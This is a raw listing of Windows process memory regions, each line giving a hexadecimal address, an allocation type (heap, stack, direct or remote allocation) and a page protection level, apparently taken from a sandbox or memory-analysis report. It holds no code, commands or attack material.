1F174DCC000
heap
page read and write
7FFD93816000
unkown
page read and write
23064F81000
heap
page read and write
2039AB9A000
heap
page read and write
7FFD93474000
unkown
page readonly
1F174CCF000
heap
page read and write
1F175A18000
heap
page read and write
1F174E6B000
heap
page read and write
182B9580000
remote allocation
page read and write
230639CF000
heap
page read and write
2F3FACF0000
heap
page read and write
23063EAD000
heap
page read and write
230641FC000
heap
page read and write
7FFDA3C11000
unkown
page execute read
1F172A47000
heap
page read and write
23063E9C000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174851000
heap
page read and write
23064535000
heap
page read and write
15425F04000
heap
page read and write
7FFDA32F3000
unkown
page readonly
1F174851000
heap
page read and write
2306434A000
heap
page read and write
1F176850000
direct allocation
page read and write
23FA0CD7000
heap
page read and write
23065EA0000
direct allocation
page read and write
1F17445A000
heap
page read and write
23064228000
heap
page read and write
24082960000
heap
page read and write
7FFDA546E000
unkown
page readonly
23063BC0000
direct allocation
page read and write
2F3FAD1D000
heap
page read and write
1F17447C000
heap
page read and write
23063A7E000
heap
page read and write
2039AB99000
heap
page read and write
23064401000
heap
page read and write
2306445F000
heap
page read and write
1F17491C000
heap
page read and write
230645B3000
heap
page read and write
7FFDA3EB1000
unkown
page execute read
15ED9320000
heap
page read and write
1F172A5D000
heap
page read and write
23065EC0000
direct allocation
page read and write
15425F11000
heap
page read and write
23064F7D000
heap
page read and write
23063A55000
heap
page read and write
1F175965000
heap
page read and write
7FF7B734F000
unkown
page read and write
95F45FF000
stack
page read and write
2039ABA8000
heap
page read and write
15425F04000
heap
page read and write
23064F7D000
heap
page read and write
23063E7D000
heap
page read and write
2499F140000
heap
page read and write
15425F04000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174E0F000
heap
page read and write
1F176870000
direct allocation
page read and write
1F172A16000
heap
page read and write
1F172A15000
heap
page read and write
230643B5000
heap
page read and write
7FFD94130000
unkown
page readonly
7FFDA3FD0000
unkown
page readonly
1F17446C000
heap
page read and write
230644AC000
heap
page read and write
1F1748AD000
heap
page read and write
7FFD93883000
unkown
page read and write
12FF7ED0000
heap
page read and write
23063EA0000
heap
page read and write
1F174D42000
heap
page read and write
1F175A93000
heap
page read and write
2306445F000
heap
page read and write
23064F6F000
heap
page read and write
1F174C7D000
heap
page read and write
7FFDA3580000
unkown
page readonly
7FFDA3FD2000
unkown
page readonly
23064301000
heap
page read and write
1FE243D0000
remote allocation
page read and write
15ED9460000
heap
page read and write
2039AB9A000
heap
page read and write
23064F36000
heap
page read and write
1F174CD0000
heap
page read and write
23063CFB000
heap
page read and write
23063E3C000
heap
page read and write
1F1759D1000
heap
page read and write
23063A1D000
heap
page read and write
2499F2CC000
heap
page read and write
7FFD93BC2000
unkown
page readonly
1695B280000
heap
page read and write
23064439000
heap
page read and write
1DEFE680000
heap
page read and write
7FFDA35E1000
unkown
page execute read
1F174DCC000
heap
page read and write
7FFD9445E000
unkown
page execute read
1F174E7F000
heap
page read and write
2306443B000
heap
page read and write
26B483F0000
heap
page read and write
1F176268000
direct allocation
page read and write
1F174C8B000
heap
page read and write
1F174720000
heap
page read and write
26B482F7000
heap
page read and write
7FFDA4330000
unkown
page readonly
29686420000
heap
page read and write
2306398F000
heap
page read and write
23061FFC000
heap
page read and write
23063DBF000
heap
page read and write
1F174413000
heap
page read and write
1F1747D0000
heap
page read and write
23063EAD000
heap
page read and write
1F174D13000
heap
page read and write
1F1748A5000
heap
page read and write
1F174803000
heap
page read and write
23064F22000
heap
page read and write
92D03BF000
stack
page read and write
2306431C000
heap
page read and write
2F3FAD44000
heap
page read and write
1F1758B0000
heap
page read and write
1F534062000
heap
page read and write
1F174477000
heap
page read and write
23063D48000
heap
page read and write
230650AB000
heap
page read and write
80E26FF000
stack
page read and write
2306502B000
heap
page read and write
23063D4E000
heap
page read and write
23061FFA000
heap
page read and write
1F176840000
direct allocation
page read and write
23063E9B000
heap
page read and write
230644AC000
heap
page read and write
7FFDA3A84000
unkown
page readonly
2039ABA8000
heap
page read and write
7FFDA3A83000
unkown
page readonly
1F174B20000
direct allocation
page read and write
2039AB9A000
heap
page read and write
7FF7B733C000
unkown
page readonly
7FFD9F3EB000
unkown
page readonly
230645CB000
heap
page read and write
1A39917F000
heap
page read and write
23064930000
direct allocation
page read and write
7FFD93819000
unkown
page read and write
7FFD9F7F5000
unkown
page read and write
23064F3B000
heap
page read and write
15425F04000
heap
page read and write
2306455D000
heap
page read and write
7FFD94836000
unkown
page read and write
2039AB9A000
heap
page read and write
2306445F000
heap
page read and write
7FFDA3749000
unkown
page read and write
15425F12000
heap
page read and write
1F17586C000
heap
page read and write
7FFD9DF80000
unkown
page readonly
22B3B1D2000
heap
page read and write
1F534026000
heap
page read and write
23063E04000
heap
page read and write
1FE24428000
heap
page read and write
230643B5000
heap
page read and write
230639DF000
heap
page read and write
2306449B000
heap
page read and write
1F174852000
heap
page read and write
230639CB000
heap
page read and write
1F174446000
heap
page read and write
15425F11000
heap
page read and write
2039AB9A000
heap
page read and write
23063A4B000
heap
page read and write
7FFD935E4000
unkown
page readonly
23064447000
heap
page read and write
23065E90000
direct allocation
page read and write
1F174F8C000
heap
page read and write
1A3991B1000
heap
page read and write
182B93A4000
heap
page read and write
1DEFE8B0000
heap
page read and write
1F17483E000
heap
page read and write
202CBB19000
heap
page read and write
2F3FAD41000
heap
page read and write
1D2C80C0000
heap
page read and write
1F175010000
heap
page read and write
2039ABA7000
heap
page read and write
7FFD9DFA4000
unkown
page read and write
182B93A3000
heap
page read and write
1F174C57000
heap
page read and write
23065EA0000
direct allocation
page read and write
296864C1000
heap
page read and write
1F174D47000
heap
page read and write
1FE24462000
heap
page read and write
1F175802000
heap
page read and write
1F17501B000
heap
page read and write
1F174E5F000
heap
page read and write
1F174620000
direct allocation
page read and write
57CED7E000
stack
page read and write
230639CC000
heap
page read and write
19F578C0000
heap
page read and write
23063EBD000
heap
page read and write
230642B9000
heap
page read and write
23063A1D000
heap
page read and write
2039AB9A000
heap
page read and write
7FFD942A5000
unkown
page readonly
7FFDA3C35000
unkown
page readonly
230642FF000
heap
page read and write
23063A50000
heap
page read and write
2039AB9A000
heap
page read and write
1F1747F8000
heap
page read and write
7FFD931E0000
unkown
page readonly
2039ABA8000
heap
page read and write
1F176840000
direct allocation
page read and write
1F176890000
direct allocation
page read and write
1A39914D000
heap
page read and write
23063A2C000
heap
page read and write
1F1748AD000
heap
page read and write
230643F1000
heap
page read and write
2274B0F0000
heap
page read and write
1F174E75000
heap
page read and write
1F1748CD000
heap
page read and write
1F172A55000
heap
page read and write
7FFDA3629000
unkown
page readonly
1F174795000
heap
page read and write
1F175859000
heap
page read and write
1F174C68000
heap
page read and write
15425F12000
heap
page read and write
7FFDA4349000
unkown
page read and write
230642D0000
heap
page read and write
182B9369000
heap
page read and write
1D2C81EB000
heap
page read and write
1F1759EA000
heap
page read and write
1F174D67000
heap
page read and write
15425F11000
heap
page read and write
7FFDA3AE0000
unkown
page readonly
2039ABA8000
heap
page read and write
1F5341E0000
remote allocation
page read and write
230641FB000
heap
page read and write
1F1747E6000
heap
page read and write
7FFDA3AF7000
unkown
page readonly
1F174F13000
heap
page read and write
E47FCFF000
unkown
page read and write
1F1744AB000
heap
page read and write
23063DB4000
heap
page read and write
1F17448A000
heap
page read and write
2039AAC0000
heap
page read and write
1695B33A000
heap
page read and write
1F174C4F000
heap
page read and write
1F176840000
direct allocation
page read and write
229249ED000
heap
page read and write
23065072000
heap
page read and write
1F174ECA000
heap
page read and write
2039ABA8000
heap
page read and write
3AA04FF000
stack
page read and write
230645DB000
heap
page read and write
1F174910000
heap
page read and write
23064445000
heap
page read and write
15425F04000
heap
page read and write
1F174E33000
heap
page read and write
1F174793000
heap
page read and write
1F174C54000
heap
page read and write
249E4FE1000
heap
page read and write
1F174C4A000
heap
page read and write
1F53402D000
heap
page read and write
23064F32000
heap
page read and write
7FFDA35EB000
unkown
page readonly
1FE24438000
heap
page read and write
23063A24000
heap
page read and write
2039AB9A000
heap
page read and write
1F174481000
heap
page read and write
1F174813000
heap
page read and write
1F174F91000
heap
page read and write
23065046000
heap
page read and write
23064500000
heap
page read and write
1F1758F0000
heap
page read and write
23064561000
heap
page read and write
230639FB000
heap
page read and write
1F17442E000
heap
page read and write
23064472000
heap
page read and write
1F174D24000
heap
page read and write
23065EB0000
direct allocation
page read and write
22B3B1B0000
heap
page read and write
15425F04000
heap
page read and write
248D05C4000
heap
page read and write
23063D06000
heap
page read and write
2039AB99000
heap
page read and write
7FFDA3C10000
unkown
page readonly
15425F11000
heap
page read and write
23063EC7000
heap
page read and write
2499F24F000
heap
page read and write
7FFD94804000
unkown
page read and write
23061FF5000
heap
page read and write
2306202B000
heap
page read and write
15425F0A000
heap
page read and write
7FFD93AFF000
unkown
page readonly
1F174885000
heap
page read and write
23063E0C000
heap
page read and write
1F174C8E000
heap
page read and write
7FFD9F3C1000
unkown
page execute read
23063E07000
heap
page read and write
230650D8000
heap
page read and write
23062015000
heap
page read and write
15425F12000
heap
page read and write
15425F13000
heap
page read and write
1F174C54000
heap
page read and write
7FFD93D01000
unkown
page execute read
D5F25DD000
stack
page read and write
2499F2CC000
heap
page read and write
7FFDA3621000
unkown
page write copy
7FFDA35A5000
unkown
page readonly
23065E80000
direct allocation
page read and write
1DEFE791000
heap
page read and write
23063DAD000
heap
page read and write
2039ABA8000
heap
page read and write
1F174C3E000
heap
page read and write
15425F12000
heap
page read and write
2306433F000
heap
page read and write
1F174F21000
heap
page read and write
2306455A000
heap
page read and write
182B9377000
heap
page read and write
7FFDA3571000
unkown
page execute read
23063DCE000
heap
page read and write
182B9388000
heap
page read and write
57CEC7B000
stack
page read and write
1F1747DA000
heap
page read and write
1DEFE8A5000
heap
page read and write
1F174ECC000
heap
page read and write
23065ED0000
direct allocation
page read and write
2F3FAD40000
heap
page read and write
7FFDA4161000
unkown
page execute read
1F17478F000
heap
page read and write
7FFD94845000
unkown
page write copy
23063E04000
heap
page read and write
23064535000
heap
page read and write
1F174452000
heap
page read and write
2B7C0175000
heap
page read and write
23063E64000
heap
page read and write
230643F7000
heap
page read and write
1F174C7A000
heap
page read and write
1F175015000
heap
page read and write
15425EC0000
heap
page read and write
2039AB9A000
heap
page read and write
23065EA0000
direct allocation
page read and write
23063E05000
heap
page read and write
1F176840000
direct allocation
page read and write
23065F00000
direct allocation
page read and write
2039ABA8000
heap
page read and write
2039AB9A000
heap
page read and write
1FE24477000
heap
page read and write
2B7C0231000
heap
page read and write
7FFDA4630000
unkown
page readonly
23063CEF000
heap
page read and write
1F17474B000
heap
page read and write
1F174743000
heap
page read and write
2039ABA8000
heap
page read and write
1F1762F0000
direct allocation
page read and write
1F1748B9000
heap
page read and write
1F1757D1000
heap
page read and write
1F17650C000
heap
page read and write
23065EA0000
direct allocation
page read and write
12FF7FBD000
heap
page read and write
1D2C80E0000
remote allocation
page read and write
1F1747B7000
heap
page read and write
7FFD947FE000
unkown
page read and write
2920B463000
heap
page read and write
23065EA0000
direct allocation
page read and write
15425F04000
heap
page read and write
1F172800000
heap
page read and write
23063DC2000
heap
page read and write
15425F04000
heap
page read and write
15425F12000
heap
page read and write
23064439000
heap
page read and write
7FFDA57F1000
unkown
page execute read
1F174C39000
heap
page read and write
15425F09000
heap
page read and write
1F17440F000
heap
page read and write
7FF78F8DC000
unkown
page readonly
7FFD940A9000
unkown
page readonly
1DEFE77A000
heap
page read and write
2039ABA8000
heap
page read and write
230645C2000
heap
page read and write
23063D88000
heap
page read and write
7FFD9F3D3000
unkown
page readonly
7FFDA3FD4000
unkown
page readonly
23065EA0000
direct allocation
page read and write
15425F12000
heap
page read and write
1F174C5A000
heap
page read and write
15425F04000
heap
page read and write
1F1759F7000
heap
page read and write
7FFDA3A93000
unkown
page readonly
1F174458000
heap
page read and write
1F17477E000
heap
page read and write
2039ABA8000
heap
page read and write
15425F12000
heap
page read and write
1F176840000
direct allocation
page read and write
230642BD000
heap
page read and write
1F1759AD000
heap
page read and write
1F174D23000
heap
page read and write
2039ABA7000
heap
page read and write
1F174F89000
heap
page read and write
23063EA0000
heap
page read and write
23063DB7000
heap
page read and write
249E4FBB000
heap
page read and write
182B93FF000
heap
page read and write
2039AB9A000
heap
page read and write
1F1758C3000
heap
page read and write
23064290000
heap
page read and write
1F1748EB000
heap
page read and write
230643BE000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174FA6000
heap
page read and write
23065EB0000
direct allocation
page read and write
1F174C46000
heap
page read and write
1F176840000
direct allocation
page read and write
7FFDA363B000
unkown
page read and write
1FE24435000
heap
page read and write
1F1743E9000
heap
page read and write
23064472000
heap
page read and write
274CF070000
heap
page read and write
7FFD94878000
unkown
page readonly
7FFDA35C2000
unkown
page readonly
1F174E97000
heap
page read and write
23064FB4000
heap
page read and write
182B9664000
heap
page read and write
23065924000
direct allocation
page read and write
1F1747B7000
heap
page read and write
15425F04000
heap
page read and write
230650D8000
heap
page read and write
23063A53000
heap
page read and write
23063D2E000
heap
page read and write
2F3FAD4E000
heap
page read and write
1FE24471000
heap
page read and write
7FFDA3FD0000
unkown
page readonly
2039AB9A000
heap
page read and write
1F1758D0000
heap
page read and write
1F174E3D000
heap
page read and write
1BA29A20000
heap
page read and write
23063E51000
heap
page read and write
1F1755D0000
direct allocation
page read and write
2039ABA8000
heap
page read and write
1F176870000
direct allocation
page read and write
1F174CD8000
heap
page read and write
15425F04000
heap
page read and write
7FF78F8DC000
unkown
page readonly
1F174E76000
heap
page read and write
7FF78F8B0000
unkown
page readonly
23064563000
heap
page read and write
230650EF000
heap
page read and write
7FFDA57F0000
unkown
page readonly
1F174C46000
heap
page read and write
2B7C0170000
heap
page read and write
1F175120000
direct allocation
page read and write
23063CF7000
heap
page read and write
1F174C21000
heap
page read and write
2274AF00000
heap
page read and write
80E25FF000
unkown
page read and write
23062000000
heap
page read and write
1F1748F7000
heap
page read and write
23063D74000
heap
page read and write
1F174E52000
heap
page read and write
23063E41000
heap
page read and write
23063EAD000
heap
page read and write
6547BCE000
stack
page read and write
23064266000
heap
page read and write
1F174C76000
heap
page read and write
1F176840000
direct allocation
page read and write
23FA0CA0000
heap
page read and write
15425F04000
heap
page read and write
1F176611000
heap
page read and write
15425F11000
heap
page read and write
1F175913000
heap
page read and write
23063E7D000
heap
page read and write
23063CE1000
heap
page read and write
2039AB9A000
heap
page read and write
1F1758AD000
heap
page read and write
23063ECC000
heap
page read and write
23063DCA000
heap
page read and write
23064441000
heap
page read and write
7FFDA54D1000
unkown
page readonly
230643EC000
heap
page read and write
230643BE000
heap
page read and write
23065EA0000
direct allocation
page read and write
7FFDA3AE1000
unkown
page execute read
1F174D42000
heap
page read and write
2F3FAD10000
heap
page read and write
1F174CE7000
heap
page read and write
1F17699C000
direct allocation
page read and write
1F174D67000
heap
page read and write
4EDCBFF000
stack
page read and write
230643E2000
heap
page read and write
7FFDA3600000
unkown
page readonly
2306427D000
heap
page read and write
1F176880000
direct allocation
page read and write
23064BA0000
direct allocation
page read and write
1F174C36000
heap
page read and write
1D2C816D000
heap
page read and write
23063D1B000
heap
page read and write
230643DB000
heap
page read and write
1F174D67000
heap
page read and write
2039AB9A000
heap
page read and write
2306454D000
heap
page read and write
1F175220000
direct allocation
page read and write
2F3FAD4C000
heap
page read and write
1F172A4C000
heap
page read and write
1F176840000
direct allocation
page read and write
1F176840000
direct allocation
page read and write
230644B1000
heap
page read and write
1F174C4A000
heap
page read and write
23FA0CFC000
heap
page read and write
1BA29BF0000
heap
page read and write
1A3990E0000
heap
page read and write
23065FDC000
direct allocation
page read and write
23063A53000
heap
page read and write
1F174484000
heap
page read and write
23064228000
heap
page read and write
2306202E000
heap
page read and write
23065E80000
direct allocation
page read and write
23064F54000
heap
page read and write
1F174EC2000
heap
page read and write
7FFDA0870000
unkown
page readonly
1F174731000
heap
page read and write
1F534091000
heap
page read and write
2039ABA7000
heap
page read and write
1F174E26000
heap
page read and write
7FFD93D28000
unkown
page execute read
1F1748C6000
heap
page read and write
1D2C8420000
heap
page read and write
23064FBD000
heap
page read and write
2039AB9A000
heap
page read and write
1F17477E000
heap
page read and write
230645B9000
heap
page read and write
230643CE000
heap
page read and write
15425F04000
heap
page read and write
7FFDA5496000
unkown
page readonly
15425F11000
heap
page read and write
1F174D13000
heap
page read and write
1F1748B8000
heap
page read and write
7FFDA3553000
unkown
page readonly
23063D83000
heap
page read and write
DB79BFF000
stack
page read and write
2039ABA8000
heap
page read and write
7FFDA35C1000
unkown
page execute read
7FFD93885000
unkown
page readonly
230639FC000
heap
page read and write
23063E06000
heap
page read and write
23065EC0000
direct allocation
page read and write
23FA0F80000
heap
page read and write
15425F12000
heap
page read and write
23065062000
heap
page read and write
D5F2DAE000
stack
page read and write
230639B0000
heap
page read and write
1F174F2E000
heap
page read and write
7FF7B7311000
unkown
page execute read
1F17488B000
heap
page read and write
2039AB9A000
heap
page read and write
1F174851000
heap
page read and write
1F176870000
direct allocation
page read and write
23064592000
heap
page read and write
7FFDA54DC000
unkown
page readonly
7FFD943E8000
unkown
page execute read
F6CE3FF000
stack
page read and write
23064348000
heap
page read and write
2039AB9A000
heap
page read and write
23063DCD000
heap
page read and write
7FFDA3661000
unkown
page execute read
23063D73000
heap
page read and write
1F1747AC000
heap
page read and write
2968649B000
heap
page read and write
7FFDA3EB2000
unkown
page readonly
2306429D000
heap
page read and write
23064465000
heap
page read and write
7FFDA5B89000
unkown
page readonly
1F1747FE000
heap
page read and write
1F1748CD000
heap
page read and write
202CBC10000
heap
page read and write
230650A8000
heap
page read and write
1D2C816F000
heap
page read and write
23061FF7000
heap
page read and write
1F1748CD000
heap
page read and write
1F175946000
heap
page read and write
15425F04000
heap
page read and write
2039AB9A000
heap
page read and write
15425F04000
heap
page read and write
1F1757FC000
heap
page read and write
2039AB9A000
heap
page read and write
23063A74000
heap
page read and write
65477D9000
stack
page read and write
7FFD94539000
unkown
page readonly
2039AB9A000
heap
page read and write
230639F3000
heap
page read and write
23FA0F8A000
heap
page read and write
7FFDA546C000
unkown
page read and write
1F175A16000
heap
page read and write
23063EC0000
heap
page read and write
1F17478F000
heap
page read and write
230645E5000
heap
page read and write
1F1747D6000
heap
page read and write
2039ABA7000
heap
page read and write
23063E5C000
heap
page read and write
15425F00000
heap
page read and write
15425F04000
heap
page read and write
7FFDA3583000
unkown
page readonly
7FFDA35D3000
unkown
page readonly
23063E44000
heap
page read and write
230650D8000
heap
page read and write
2039AB9A000
heap
page read and write
23064F6F000
heap
page read and write
7FFD943B4000
unkown
page readonly
23065808000
direct allocation
page read and write
1BA29A42000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174E0F000
heap
page read and write
230639B6000
heap
page read and write
2039AB9A000
heap
page read and write
1F175A28000
heap
page read and write
7FFDA4163000
unkown
page readonly
7FFDA3EB4000
unkown
page readonly
1F176870000
direct allocation
page read and write
15425F12000
heap
page read and write
23064447000
heap
page read and write
230639F8000
heap
page read and write
230642D4000
heap
page read and write
2274AF07000
heap
page read and write
23062027000
heap
page read and write
F9F967F000
stack
page read and write
7FFDA3620000
unkown
page read and write
23063A23000
heap
page read and write
15425F04000
heap
page read and write
7FFDA3C31000
unkown
page write copy
15425F13000
heap
page read and write
2039ABA8000
heap
page read and write
1F174D2A000
heap
page read and write
1F1747DA000
heap
page read and write
7FFD94874000
unkown
page read and write
F251FFF000
unkown
page read and write
23063CEF000
heap
page read and write
1F1758D0000
heap
page read and write
7FF7B7353000
unkown
page readonly
1F174D12000
heap
page read and write
230650A3000
heap
page read and write
1F174482000
heap
page read and write
23065079000
heap
page read and write
1F174E4B000
heap
page read and write
23063D3D000
heap
page read and write
23063A24000
heap
page read and write
23065EC0000
direct allocation
page read and write
7FF7B7353000
unkown
page readonly
1F1748B4000
heap
page read and write
7FFDA3A84000
unkown
page read and write
182B9374000
heap
page read and write
2F3FAF74000
heap
page read and write
1F174833000
heap
page read and write
2499F273000
heap
page read and write
1F534091000
heap
page read and write
1F1744D2000
heap
page read and write
15425F04000
heap
page read and write
230643ED000
heap
page read and write
2039AB9A000
heap
page read and write
1F17476E000
heap
page read and write
23063DBA000
heap
page read and write
15425F01000
heap
page read and write
2C46669A000
heap
page read and write
1F175AA8000
heap
page read and write
230641FC000
heap
page read and write
23063E5C000
heap
page read and write
7FFD93C22000
unkown
page read and write
92CFDDD000
stack
page read and write
23061FD1000
heap
page read and write
7FFD93D00000
unkown
page readonly
D5F2F9F000
stack
page read and write
22924C30000
heap
page read and write
15425F11000
heap
page read and write
1F176840000
direct allocation
page read and write
23064500000
heap
page read and write
E6491FF000
stack
page read and write
1F1747FE000
heap
page read and write
2306433F000
heap
page read and write
7FFDA3C30000
unkown
page read and write
23064431000
heap
page read and write
23063CF5000
heap
page read and write
1F176840000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
19F57912000
heap
page read and write
7FFD9E840000
unkown
page readonly
7FFD94604000
unkown
page readonly
1F1754C0000
heap
page read and write
23063DCB000
heap
page read and write
2306455A000
heap
page read and write
23065EA0000
direct allocation
page read and write
1F1748F8000
heap
page read and write
7FFDA3672000
unkown
page readonly
23063D91000
heap
page read and write
296864B1000
heap
page read and write
2306445B000
heap
page read and write
2039AB99000
heap
page read and write
1F174F2C000
heap
page read and write
2039AB99000
heap
page read and write
1F1744AF000
heap
page read and write
1F175934000
heap
page read and write
1FE2443C000
heap
page read and write
2039ABA8000
heap
page read and write
23063E81000
heap
page read and write
7FFDA5467000
unkown
page readonly
2C466690000
heap
page read and write
7FFD9F3E0000
unkown
page readonly
1F176850000
direct allocation
page read and write
7FFD9F3C3000
unkown
page read and write
1F17585B000
heap
page read and write
2039ABA1000
heap
page read and write
1F174CA0000
heap
page read and write
7FFD9E853000
unkown
page readonly
1F176850000
direct allocation
page read and write
1F174C89000
heap
page read and write
2274AF32000
heap
page read and write
2C466600000
heap
page read and write
23063D08000
heap
page read and write
22B3B1BA000
heap
page read and write
230643E1000
heap
page read and write
23063A51000
heap
page read and write
1A3991CB000
heap
page read and write
1F174F16000
heap
page read and write
202CBB10000
heap
page read and write
1F172A38000
heap
page read and write
23062016000
heap
page read and write
23063E06000
heap
page read and write
2499F272000
heap
page read and write
1F174CED000
heap
page read and write
15425F11000
heap
page read and write
2039AB99000
heap
page read and write
7FFDA5490000
unkown
page readonly
1F172A39000
heap
page read and write
15425F04000
heap
page read and write
916CEFD000
stack
page read and write
23064F69000
heap
page read and write
7FFDA4330000
unkown
page readonly
1F1744DC000
heap
page read and write
7FFDA3A81000
unkown
page execute read
65477D5000
stack
page read and write
1F174C95000
heap
page read and write
1F1759EF000
heap
page read and write
1F174424000
heap
page read and write
86C5CFE000
stack
page read and write
23063D83000
heap
page read and write
2039ABA6000
heap
page read and write
1F172A2D000
heap
page read and write
7FFDA546D000
unkown
page readonly
248D0390000
heap
page read and write
2039ABA7000
heap
page read and write
1A399143000
heap
page read and write
1F176840000
direct allocation
page read and write
2306448C000
heap
page read and write
2039AB9A000
heap
page read and write
1F174793000
heap
page read and write
7FFD93ACC000
unkown
page readonly
7FFDA3BFC000
unkown
page read and write
1F175A10000
heap
page read and write
1F176614000
heap
page read and write
7FFDA4DA0000
unkown
page readonly
7FFD93D9E000
unkown
page execute read
23063E44000
heap
page read and write
1F1747D6000
heap
page read and write
2039ABA8000
heap
page read and write
23063DB9000
heap
page read and write
1F174847000
heap
page read and write
2C466865000
heap
page read and write
2306510B000
heap
page read and write
23064445000
heap
page read and write
2039ABA8000
heap
page read and write
2039C570000
heap
page read and write
1F1747FC000
heap
page read and write
7FFD94180000
unkown
page readonly
26B48311000
heap
page read and write
1F174C4E000
heap
page read and write
1F1748CB000
heap
page read and write
2039ABA6000
heap
page read and write
23063A4A000
heap
page read and write
1D2C7FC0000
heap
page read and write
7FF78F8F3000
unkown
page readonly
1F175A47000
heap
page read and write
23063A5A000
heap
page read and write
1BA29C40000
heap
page read and write
2920B46D000
heap
page read and write
230645CB000
heap
page read and write
7FFD9DF30000
unkown
page readonly
1F174C93000
heap
page read and write
7FFD94447000
unkown
page execute read
7FFDA3621000
unkown
page execute read
1F17586C000
heap
page read and write
2306433F000
heap
page read and write
1F176870000
direct allocation
page read and write
1F174886000
heap
page read and write
1F174FAD000
heap
page read and write
15425F04000
heap
page read and write
2039AB9D000
heap
page read and write
15425F04000
heap
page read and write
230642CF000
heap
page read and write
15425F11000
heap
page read and write
1F174885000
heap
page read and write
21A8A9C4000
heap
page read and write
21BEDD9000
stack
page read and write
1F17448E000
heap
page read and write
1F1747A2000
heap
page read and write
23065E80000
direct allocation
page read and write
80E24FB000
stack
page read and write
1F1768C0000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
23063DF9000
heap
page read and write
15ED9440000
heap
page read and write
1F174467000
heap
page read and write
23065EB0000
direct allocation
page read and write
1F1757F4000
heap
page read and write
92CFFDE000
stack
page read and write
23063A57000
heap
page read and write
1F17474C000
heap
page read and write
2039ABA8000
heap
page read and write
1FE24448000
heap
page read and write
7FFD944C0000
unkown
page readonly
1F174E67000
heap
page read and write
1F17479E000
heap
page read and write
23063A7C000
heap
page read and write
1F17449C000
heap
page read and write
1F17446F000
heap
page read and write
15425F12000
heap
page read and write
1F174D1E000
heap
page read and write
1F174C26000
heap
page read and write
1A3991B1000
heap
page read and write
AC18FF000
unkown
page read and write
1F174786000
heap
page read and write
1F174C36000
heap
page read and write
1F17491B000
heap
page read and write
1F17474A000
heap
page read and write
7FFD9F7F1000
unkown
page execute read
7FFDA3C1D000
unkown
page readonly
1F172A46000
heap
page read and write
2306588C000
direct allocation
page read and write
1D2C81D1000
heap
page read and write
7FFDA3561000
unkown
page execute read
7FFDA35AF000
unkown
page readonly
2039AB9A000
heap
page read and write
1F174D18000
heap
page read and write
1FE24463000
heap
page read and write
1F17484D000
heap
page read and write
1F5340AB000
heap
page read and write
1F174F1B000
heap
page read and write
23063E8B000
heap
page read and write
1F174D24000
heap
page read and write
1F174446000
heap
page read and write
2306200C000
heap
page read and write
1F174D29000
heap
page read and write
23063A66000
heap
page read and write
274CF090000
heap
page read and write
1F1747C0000
heap
page read and write
2039AB99000
heap
page read and write
D5F318F000
stack
page read and write
2F3FAD17000
heap
page read and write
7FFD9E859000
unkown
page readonly
1F176840000
direct allocation
page read and write
23063E89000
heap
page read and write
1F174E5F000
heap
page read and write
7FFDA35D1000
unkown
page execute read
23063A7E000
heap
page read and write
1F174D29000
heap
page read and write
1F1743F4000
heap
page read and write
1F174CDB000
heap
page read and write
1F17661F000
heap
page read and write
1695B290000
heap
page read and write
230639F1000
heap
page read and write
23063D11000
heap
page read and write
1F174F2F000
heap
page read and write
249E4FD1000
heap
page read and write
7FFD9DF61000
unkown
page read and write
23063A7B000
heap
page read and write
7FFD937DF000
unkown
page write copy
2274AEB0000
heap
page read and write
23064F2F000
heap
page read and write
230642A9000
heap
page read and write
7FFDA3AE3000
unkown
page readonly
7FFD9375C000
unkown
page write copy
1F174C57000
heap
page read and write
23063D83000
heap
page read and write
22B3B3A0000
heap
page read and write
23064559000
heap
page read and write
7FFD94201000
unkown
page execute read
1F1747E1000
heap
page read and write
15427780000
heap
page read and write
23063E14000
heap
page read and write
248D02D0000
heap
page read and write
23065920000
direct allocation
page read and write
1F1747D6000
heap
page read and write
23064509000
heap
page read and write
23065EA0000
direct allocation
page read and write
23FA0CED000
heap
page read and write
1F172A57000
heap
page read and write
1F17484C000
heap
page read and write
23063A07000
heap
page read and write
23065011000
heap
page read and write
57CEEFF000
stack
page read and write
7FFD936EA000
unkown
page read and write
1F17483E000
heap
page read and write
1F174E06000
heap
page read and write
1C7C6FD000
stack
page read and write
15425F04000
heap
page read and write
1D2C8162000
heap
page read and write
23065FFC000
direct allocation
page read and write
1F17479F000
heap
page read and write
7FFDA4DA3000
unkown
page readonly
230645B7000
heap
page read and write
1F17446C000
heap
page read and write
2039ABA8000
heap
page read and write
1F17661A000
heap
page read and write
1F174F79000
heap
page read and write
1F174DCC000
heap
page read and write
23FA0C60000
heap
page read and write
1F176358000
direct allocation
page read and write
1F174F99000
heap
page read and write
1F17490C000
heap
page read and write
230644BC000
heap
page read and write
230645C9000
heap
page read and write
23063ECD000
heap
page read and write
23065E80000
direct allocation
page read and write
23063E8A000
heap
page read and write
2039ABA8000
heap
page read and write
1F176840000
direct allocation
page read and write
1F1758D0000
heap
page read and write
23063E09000
heap
page read and write
1F172A36000
heap
page read and write
7FFD94072000
unkown
page readonly
23061FF9000
heap
page read and write
8BB2D6D000
stack
page read and write
7FFDA3635000
unkown
page readonly
1F174C76000
heap
page read and write
1F174767000
heap
page read and write
15425F04000
heap
page read and write
2039ABA8000
heap
page read and write
1A399172000
heap
page read and write
23063E44000
heap
page read and write
7FFD93D22000
unkown
page execute read
230644BA000
heap
page read and write
23063988000
heap
page read and write
23065EA0000
direct allocation
page read and write
7FFD93825000
unkown
page write copy
7FF7B733C000
unkown
page readonly
1F1748F9000
heap
page read and write
7FFD948AA000
unkown
page readonly
1F174ECC000
heap
page read and write
23065E80000
direct allocation
page read and write
274CF120000
heap
page read and write
21A8A6B0000
heap
page read and write
23065EB0000
direct allocation
page read and write
23063D78000
heap
page read and write
23064557000
heap
page read and write
1F174E5A000
heap
page read and write
1F17476B000
heap
page read and write
1F174885000
heap
page read and write
2039ABA8000
heap
page read and write
1F174C76000
heap
page read and write
23064566000
heap
page read and write
7FFDA3A91000
unkown
page execute read
23065E80000
direct allocation
page read and write
7FFDA3562000
unkown
page readonly
7FFDA5471000
unkown
page read and write
23061F20000
heap
page readonly
F251EFB000
stack
page read and write
1F1747EE000
heap
page read and write
2039AB9A000
heap
page read and write
1F174CF1000
heap
page read and write
2306434C000
heap
page read and write
23064257000
heap
page read and write
23063D03000
heap
page read and write
1F175941000
heap
page read and write
